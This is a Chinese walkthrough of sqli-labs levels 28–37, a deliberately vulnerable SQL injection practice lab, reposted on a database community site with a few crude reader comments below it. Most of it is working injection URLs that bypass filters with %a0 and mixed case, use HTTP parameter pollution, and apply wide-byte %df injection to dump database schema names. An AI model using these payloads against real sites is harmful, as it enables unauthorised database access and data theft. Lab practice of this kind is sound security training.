第28关
根据提示 基于错误的所有union select 都属于我们,带括号的字符串单引号
http://192.168.1.11/sqli/Less-28/?id=1') and ('1')=('1
http://192.168.1.11/sqli/Less-28/?id=1') and ('1')=('2
http://192.168.1.11/sqli/Less-28/?id=100')%a0uNion%a0selEct%a01,2,3%a0and%a0('1')=('1
http://192.168.1.11/sqli/Less-28/?id=100')%a0UnIoN%a0sElEct%a01,(select%a0(group_concat(schema_name))from(information_schema.schemata)),3%a0and%a0('1')=('1复制
第28a关
根据提示 单引号带括号 过滤了 union select 盲注
和28关一样的闭合方式
http://192.168.1.11/sqli/Less-28a/?id=-10')%a0UnIoN%a0sElEct%a01,(database()),3%a0and%a0('1')=('1
http://192.168.1.11/sqli/Less-28a/?id=-10')%a0UnIoN%a0sElEct%a01,(select%a0(group_concat(schema_name))from(information_schema.schemata)),3%a0and%a0('1')=('1复制
第29关
根据提示 双服务器 单引号 字符串
这里的双服务器指的是 第一部分的 以tomcat为引擎的jsp服务器,第二部分是 以apache为引擎的php服务器,第一部分的 Tomcat 就可以充当一个WAF
但实际上如果不配置 Tomcat 可以使用
http://192.168.1.11/sqli/Less-29/?id=-1' union select 1,2,3%23复制
配置之后
http://192.168.1.11/sqli/Less-29/?id=1&id=2'
Tomcat 会解析第一个参数 id=1
而Apache 则解析 最后一个参数 id=2
http://192.168.1.11/sqli/Less-29/?id=1&id=-1' union select 1,2,3 %23复制
第30关
和29关类似,闭合方式为 双引号
http://192.168.1.11/sqli/Less-29/?id=1&id=-1" union select 1,2,3 %23复制
第31关
和29.30关类似,闭合方式为 ")
http://192.168.1.11/sqli/Less-29/?id=1&id=-1") union select 1,2,3 %23复制
第32关
根据提示 宽字节注入
http://192.168.1.11/sqli/Less-32/?id=1%df' order by 3%23
http://192.168.1.11/sqli/Less-32/?id=-1%df' union select 1,2,3%23
http://192.168.1.11/sqli/Less-32/?id=-1%df' union select 1,(select group_concat(schema_name) from information_schema.schemata),3%23复制
第33关
与32关一样的,只不过是 使用了 addslasher()函数
第34关
根据提示 post型 宽字节
测试的时候发现 单引号被转义了,使用 burp suite进行抓包处理,
经过抓包发现,% 被解析成 %25了,那么就修改 burp中 uname
第35关
正常 整数型 注入就可以了
id=-1 union select 1,2,3%23复制
第36关
使用了 mysql_real_escape_string函数,其他的一样
http://192.168.1.11/sqli/Less-36/?id=-1%df' union select 1,2,3%23复制
第37关
和34一样,只不过函数不同。
文章转载自老徐今天也很棒,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。
评论
害老子作业没交上
2年前

评论
你个勾八玩意
2年前

评论
你要不要看看你输的玩意
2年前

评论
相关阅读
2025年4月中国数据库流行度排行榜:OB高分复登顶,崖山稳驭撼十强
墨天轮编辑部
1284次阅读
2025-04-09 15:33:27
2025年3月国产数据库大事记
墨天轮编辑部
728次阅读
2025-04-03 15:21:16
2025年3月国产数据库中标情况一览:TDSQL大单622万、GaussDB大单581万……
通讯员
527次阅读
2025-04-10 15:35:48
征文大赛 |「码」上数据库—— KWDB 2025 创作者计划启动
KaiwuDB
455次阅读
2025-04-01 20:42:12
数据库,没有关税却有壁垒
多明戈教你玩狼人杀
406次阅读
2025-04-11 09:38:42
优炫数据库成功应用于国家电投集团青海海南州新能源电厂!
优炫软件
383次阅读
2025-03-21 10:34:08
天津市政府数据库框采结果公布!
通讯员
313次阅读
2025-04-10 12:32:35
最近我为什么不写评论国产数据库的文章了
白鳝的洞穴
308次阅读
2025-04-07 09:44:54
从HaloDB体验到国产数据库兼容性
多明戈教你玩狼人杀
267次阅读
2025-04-07 09:36:17
国产数据库需要扩大场景覆盖面才能在竞争中更有优势
白鳝的洞穴
234次阅读
2025-04-14 09:40:20